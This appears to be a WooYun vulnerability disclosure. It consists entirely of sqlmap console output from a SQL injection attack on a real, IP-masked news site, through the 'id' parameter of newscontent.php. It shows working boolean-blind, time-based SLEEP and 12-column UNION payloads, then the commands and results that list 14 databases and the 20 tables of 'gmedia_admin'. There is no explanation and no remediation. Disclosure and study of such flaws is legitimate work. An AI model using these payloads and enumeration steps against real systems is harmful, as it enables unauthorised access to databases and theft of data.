WooYun.org

D:\tool\sqlmap>sqlmap.py -u  http://**.**.**.**/news/newscontent.php?id=218 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150821}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:05:14
[16:05:15] [INFO] resuming back-end DBMS 'mysql'
[16:05:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=218 AND 7760=7760
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=218 AND (SELECT * FROM (SELECT(SLEEP(5)))wEXF)
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: id=-8578 UNION ALL SELECT NULL,CONCAT(0x7162717871,0x76525953466e6b4b6e51,0x71786a6b71),NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL--
---
[16:05:15] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12
[16:05:15] [INFO] fetching database names
[16:05:15] [WARNING] the SQL query provided does not return any output
[16:05:15] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch
 '--hex'
[16:05:15] [INFO] fetching number of databases
[16:05:15] [INFO] resumed: 14
[16:05:15] [INFO] resumed: information_schema
[16:05:15] [INFO] resumed: gmedia
[16:05:15] [INFO] resumed: gmedia_admin
[16:05:15] [INFO] resumed: gmedia_wap
[16:05:15] [INFO] resumed: icinga
[16:05:15] [INFO] resumed: jfdaily
[16:05:15] [INFO] resumed: meeting
[16:05:15] [INFO] resumed: mo_comm
[16:05:15] [INFO] resumed: mo_gmedia
[16:05:15] [INFO] resumed: mobilenumber
[16:05:15] [INFO] resumed: mysql
[16:05:15] [INFO] resumed: mzu
[16:05:15] [INFO] resumed: test
[16:05:15] [INFO] resumed: zabbix
available databases [14]:
[*] gmedia
[*] gmedia_admin
[*] gmedia_wap
[*] icinga
[*] information_schema
[*] jfdaily
[*] meeting
[*] mo_comm
[*] mo_gmedia
[*] mobilenumber
[*] mysql
[*] mzu
[*] test
[*] zabbix
[16:05:15] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'
D:\tool\sqlmap>sqlmap.py -u  http://**.**.**.**/news/newscontent.php?id=218 -D gmedia_admin --tables
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150821}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:06:10
[16:06:10] [INFO] resuming back-end DBMS 'mysql'
[16:06:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=218 AND 7760=7760
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=218 AND (SELECT * FROM (SELECT(SLEEP(5)))wEXF)
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: id=-8578 UNION ALL SELECT NULL,CONCAT(0x7162717871,0x76525953466e6b4b6e51,0x71786a6b71),NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL--
---
[16:06:11] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12
[16:06:11] [INFO] fetching tables for database: 'gmedia_admin'
[16:06:11] [WARNING] the SQL query provided does not return any output
[16:06:11] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch
 '--hex'
[16:06:11] [INFO] fetching number of tables for database 'gmedia_admin'
[16:06:11] [INFO] resumed: 20
[16:06:11] [INFO] resumed: gmedia_agent
[16:06:11] [INFO] resumed: gmedia_code
[16:06:11] [INFO] resumed: gmedia_code_type
[16:06:11] [INFO] resumed: gmedia_content
[16:06:11] [INFO] resumed: gmedia_item
[16:06:11] [INFO] resumed: gmedia_survey
[16:06:11] [INFO] resumed: gmedia_survey_item
[16:06:11] [INFO] resumed: gmedia_user
[16:06:11] [INFO] resumed: mo_blog
[16:06:11] [INFO] resumed: mo_blog_media
[16:06:11] [INFO] resumed: mo_code_format
[16:06:11] [INFO] resumed: mo_logo
[16:06:11] [INFO] resumed: mo_mobile
[16:06:11] [INFO] resumed: mo_soft
[16:06:11] [INFO] resumed: qr_info
[16:06:11] [INFO] resumed: qr_publish
[16:06:11] [INFO] resumed: qr_survey
[16:06:11] [INFO] resumed: qr_survey_user
[16:06:11] [INFO] resumed: vote_items
[16:06:11] [INFO] resumed: vote_title
Database: gmedia_admin
[20 tables]
+--------------------+
| gmedia_agent       |
| gmedia_code        |
| gmedia_code_type   |
| gmedia_content     |
| gmedia_item        |
| gmedia_survey      |
| gmedia_survey_item |
| gmedia_user        |
| mo_blog            |
| mo_blog_media      |
| mo_code_format     |
| mo_logo            |
| mo_mobile          |
| mo_soft            |
| qr_info            |
| qr_publish         |
| qr_survey          |
| qr_survey_user     |
| vote_items         |
| vote_title         |
+--------------------+
[16:06:11] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'
[*] shutting down at 16:06:11